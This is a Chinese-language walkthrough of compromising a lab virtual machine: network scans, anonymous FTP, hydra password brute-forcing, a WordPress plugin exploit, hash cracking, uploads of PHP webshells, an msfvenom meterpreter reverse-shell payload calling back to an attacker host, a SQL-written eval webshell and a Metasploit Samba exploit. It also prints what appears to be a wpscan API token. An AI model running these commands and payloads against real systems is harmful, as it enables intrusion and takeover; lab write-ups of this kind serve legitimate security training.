arp-scan -l找到靶机ip:192.168.20.3

nmap -p0-65535 192.168.20.3快速扫描开放的端口号

nmap -p20,21,22,53,80,123,137,138,139,666,3306,12380 -A 192.168.20.3详细扫描开放端口运行的服务,

1

这个ftp是未授权访问,可以进行匿名登录–Anonymous

dir发现有note文件,直接get note下载到电脑桌面,打开后发现Elly账号有payload,可以考虑ssh密码爆破,另外也有John账号

同时也可以用kali自带的工具收集信息,比如enum4linux

enum4linux -a 192.168.20.3收集到大量的账户信息

2

就是这一堆,但是我们只需要小框里面的,可以直接让ai处理后发出来也可以要一个命令行代码,比如cat user.txt | cut -d ‘\ -f2 | cut -d ‘ ‘ -f1 > user.txt

用hydra进行爆破ssh/ftp:hydra -L user.txt -P user.txt 192.168.20.3 ssh/ftp

login: SHayslett password: SHayslett—-ftp和ssh都可以登录

ftp里面有大量文件可以获取信息,ssh能登录进行提取

80端口没有任何东西,不过也发现有12380端口

nikto -h https://192.168.20.3:12380/ >>192.168.20.3

3

/admin112233/ /blogbolg/这里有两个目录,同时也开启了SSL协议

wpscan –url https://192.168.20.3:12380/blogblog/ -e u –api-token rXPAHHYlLrF3xr50aaaFKWdIsNckML8Oqhr7sCpdJqQ –disable-tls-checks >> 192.168.20.3 2>&1

4

5

扫到了登录,上传,还有插件信息

6

搜到了相关可利用的漏洞,用39646.py但是要有修改,把http改成https,另外需要

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

7

直接python2 39646.py,在上传目录发现一个图片,直接cat一下发现账号密码

8

mysql -uroot -pplbkac -h 192.168.111.129连接mysql

找到密码的字段

9

复制粘贴到sql.txt然后

通过正则表达式提取出加密的md5–awk -F’|‘ ‘{print $3}’ sql.txt > sql1.txt

10

john –wordlist=/usr/share/wordlists/rockyou.txt sql1.txt

用john字典试出来密码。结合上面知道的两个账号,用burpsuite爆破后台登录密码

账号:john密码:incorrect

11

这里肯定有一个上传的位置,可以直接传马

cp /usr/share/webshells/php/php-reverse-shell.php . /这个直接点击就行

weevely generate shell dayu.php

/这个需要

weevely https://192.168.1.24:12380/blogblog/wp-content/uploads/dayu.php passwd

并且点一下

webacoo -g -o test.php

webacoo -t -u https://192.168.1.24:12380/blogblog/wp-content/uploads/test.php

//生成webshell

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.12 LPORT=4455 -f raw > ms.php

//监听

msfconsole

use exploit/multi/handler

set payload php/meterpreter_reverse_tcp

set LHOST 192.168.1.12

set LPORT 4455

run

mysql -uroot -pplbkac -h 192.168.1.24

select ‘<?php eval($_POST[“cmd”]);?>’ into file ‘/var/www/https/blogblog/wp-content/uploads/shell.php’;

永恒之蓝–139端口:

msfconsole

search Samba —符合2017年的就几个

use exploit/linux/samba/is_known_pipename

set rhosts 192.168.1.24

set rport 139

run

提权

uname -a 查看系统版本内核searchsploit Linux Kernel 4.4.x 根据版本内核找到可以利用的exp

cp /usr/share/exploitdb/exploits/linux/local/39772.txt . 将exp下载到本地

我们看内容发现利用不了,只是给了我们方法